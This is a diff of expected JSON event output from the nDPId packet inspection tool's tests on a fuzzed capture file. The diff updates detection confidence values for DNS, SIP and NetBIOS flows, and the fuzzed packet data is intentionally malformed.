00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1120470848643,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470848643,"pkt":"ADBUADRWAODtAW69CABFAABIW7sAAIARS5bAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120470848686} 00798{"packet_event_id":1,"packet_event_name":"packet","packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":382,"pkt_l4_len":0,"thread_ts_msec":1120470848682,"pkt":"ADBUADRWAODtAW69CAA\/AAFwa7wAAIARFgHAeQEC1PIhIxPEE8QBXMMEQUNLIHNpcDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KRnJvbTogImFyaWsiIDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTE3NWExZGQNbENhbGwtSUQ6IDI0NDg3MzkxLTQ0OWJmMmEwQDE5Mi4xNjguMS4yDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yOjUwNjA7YnJhbmNoPXo5aEc0YktucDI0NDY2NDAyLTQ1ZGM2MWQ1MTkyLjE2OC4xLjI7cnBvcnQNClRvOiA8c2lwOjAwOTcyMzkyODcwNDRAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTBMLTA0JXMALTE3MDFiOWEwLTEzYzkyYTY3Mg0KQ1NlcTogMSBBQ0sNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1120470849636,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470849636,"pkt":"ADBUADRWAODtAW69CABFAABIa70AAIARS5TAqAECwKgBAQr0ADUANOq3JXMAAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj6XR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848643,"flow_last_seen":1120470849636,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470657808,"flow_last_seen":1120470666317,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848643,"flow_last_seen":1120470849636,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470657808,"flow_last_seen":1120470666317,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469635127,"flow_last_seen":1120470796804,"flow_idle_time":620000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1120470851639,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CABFAABIa74AAIARS5PAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2136,"global_ts_msec":1120470853642} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CFhFAABIa78AAIARS5LAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAET3VkcANzaXAJY3liZXJjaXR5AuRrAFchAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470857648} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CABFAABJa8QAAIARS43AqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1120470865650,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470865650,"pkt":"ADBUADRWAODtAW69CABFAABEa8UAAIARS5DAqAECwKgBAQr1ADMAMFWvzyVzAAABAAAAAAAAATEBMAEwAzEyNwdpbj1hZGRyBGFmcGEAAAwAAQ=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470865651,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1120470865651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470865651,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvUARzgrzxqAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsbmNhbGhvc3QA"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470865651,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470865651,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865712,"flow_last_seen":1120470865712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470865712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1120470865712,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470865712,"pkt":"ADBUADRWAODtAW69CABFAABIa8cAAIARS4rAqAECwKgBAQr2ADUANKezghsBAAABAAAAAAAABF9zaU0EX3VkcANzaXAJY3tiZXJbaXRNAmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865712,"flow_last_seen":1120470865712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470865712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sim._udp.sip.c_ber_itm.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865712,"flow_last_seen":1120470865712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470865712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sim._udp.sip.c_ber_itm.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1120470866711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470866711,"pkt":"ADBUADRWAODtAW69CABFAABIa8gAAIARS4jAqAECwKgBAQr2ADUANKezghsBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJYzRiZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":561,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470865712,"flow_last_seen":1120470866711,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470866711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.c4bercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":561,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470865712,"flow_last_seen":1120470866711,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470866711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.c4bercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 